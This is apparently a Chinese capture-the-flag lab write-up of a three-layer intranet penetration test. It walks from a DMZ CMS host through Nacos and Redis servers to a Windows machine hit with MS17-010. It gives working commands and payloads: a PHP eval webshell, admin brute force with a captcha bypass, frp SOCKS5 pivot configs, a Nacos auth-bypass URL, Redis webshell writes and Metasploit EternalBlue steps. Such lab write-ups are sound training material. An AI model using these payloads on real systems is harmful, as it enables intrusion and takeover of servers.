三层渗透测试-DMZ区域 & 二三层设备区域
字数 1962 2025-08-22 12:23:30
三层网络渗透测试实战教学文档
1. DMZ区域渗透测试
1.1 信息收集阶段
网络扫描
- 使用
ifconfig确认攻击机与DMZ靶机连接的网段:192.168.50.0/24 - 使用nmap扫描发现目标:
nmap -sS 192.168.50.0/24 - 发现192.168.50.128开放8080端口,确认为目标CMS平台
目录扫描
- 使用dirsearch工具扫描网站目录:
python3 dirsearch.py -u http://192.168.50.128:8080 -e * - 发现关键文件:
- 管理后台地址:/dede/login.php
- SQL相关文件:/data/sql.txt
FTP信息获取
- 从sql.txt中发现FTP凭证:
- 用户名:ftpuser
- 密码:ftppass@123
- 连接FTP获取网站源码:
ftp 192.168.50.128→get dedecms.zip
1.2 源码审计与漏洞利用
后台登录分析
- 分析/dede/login.php登录逻辑
- 发现验证码机制,使用captcha-killer-modified插件绕过:
- GitHub地址:https://github.com/f0ng/captcha-killer-modified
- 配置教程参考:https://blog.csdn.net/weixin_72986003/article/details/144359468
- 爆破成功获取管理员凭证:
- 用户名:admin
- 密码:admin123
文件上传漏洞利用
- 登录后台后,发现"附件管理"功能
- 修改系统参数,添加允许上传的文件类型(如.php)
- 直接上传Webshell:
<?php @eval($_POST['cmd']);?> - 使用蚁剑连接:http://192.168.50.128:8080/uploads/shell.php
获取flag
- 在administrator桌面找到flag文件
- flag值:
flag{78477a738c06620b872421af357d2cd5}
2. 二层设备区域渗透
2.1 内网信息收集
网络拓扑发现
- 在已控制的DMZ主机上执行:
ipconfig /all - 发现第二网卡信息:192.168.60.0/24
内网扫描
- 上传fscan工具到DMZ主机
- 执行扫描:
fscan -h 192.168.60.0/24 - 发现关键服务:
- 192.168.60.129:8848 - Nacos服务
- 192.168.60.129:6379 - Redis服务
2.2 内网代理建立
使用frp建立隧道
- 攻击机配置frps.ini:
[common] bind_port = 7000 - 启动服务端:
./frps -c frps.ini - DMZ主机配置frpc.ini:
[common] server_addr = 192.168.50.1 server_port = 7000 [socks5] type = tcp remote_port = 1080 plugin = socks5 - 启动客户端:
./frpc -c frpc.ini
配置代理工具
- 修改/etc/proxychains4.conf:
socks5 192.168.50.1 1080
2.3 漏洞利用
Nacos认证绕过
- 访问漏洞URL:
http://192.168.60.129:8848/nacos/v1/auth/users?username=test&password=test - 使用POST方法创建管理员账户
- 登录获取第一个flag
Redis未授权访问
- 使用获取的密码连接Redis:
redis-cli -h 192.168.60.129 -a redispass - 写入Webshell:
config set dir /var/www/html config set dbfilename shell.php set x "<?php @eval($_POST['cmd']);?>" save - 使用蚁剑连接获取根目录flag
3. 三层设备区域渗透
3.1 信息收集
上传扫描工具
- 将fscan上传至二层设备
- 执行扫描:
./fscan -h 192.168.70.0/24 - 发现MS17-010漏洞(永恒之蓝)
3.2 漏洞利用
使用MSF进行攻击
- 启动msfconsole
- 搜索漏洞模块:
search ms17_010 use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.70.130 exploit - 注入payload获取meterpreter会话
获取权限
- 漏洞利用会自动创建用户:
- 用户名:hacker
- 密码:P@ssw0rd
- 使用psexec.py连接:
python3 psexec.py hacker:'P@ssw0rd'@192.168.70.130
获取flag
- 在pro用户桌面找到flag文件
4. 关键工具与资源
-
信息收集工具:
- nmap
- dirsearch
- fscan (内网综合扫描工具)
-
漏洞利用工具:
- captcha-killer-modified (验证码绕过)
- frp (内网穿透)
- Metasploit Framework
-
Webshell管理:
- 蚁剑(AntSword)
- 冰蝎(Behinder)
-
参考资源:
- Nacos认证绕过分析:https://blog.csdn.net/weixin_51345872/article/details/127066347
- 验证码爆破教程:https://blog.csdn.net/weixin_72986003/article/details/144359468
5. 渗透测试流程图
开始
│
├─ DMZ区域渗透
│ ├─ 信息收集(nmap, dirsearch)
│ ├─ FTP凭证获取
│ ├─ 后台爆破(captcha-killer)
│ ├─ 文件上传漏洞利用
│ └─ 获取flag
│
├─ 二层区域渗透
│ ├─ 内网扫描(fscan)
│ ├─ 建立隧道(frp)
│ ├─ Nacos漏洞利用
│ ├─ Redis漏洞利用
│ └─ 获取flag
│
└─ 三层区域渗透
├─ 扫描发现MS17-010
├─ 永恒之蓝漏洞利用
└─ 获取flag
结束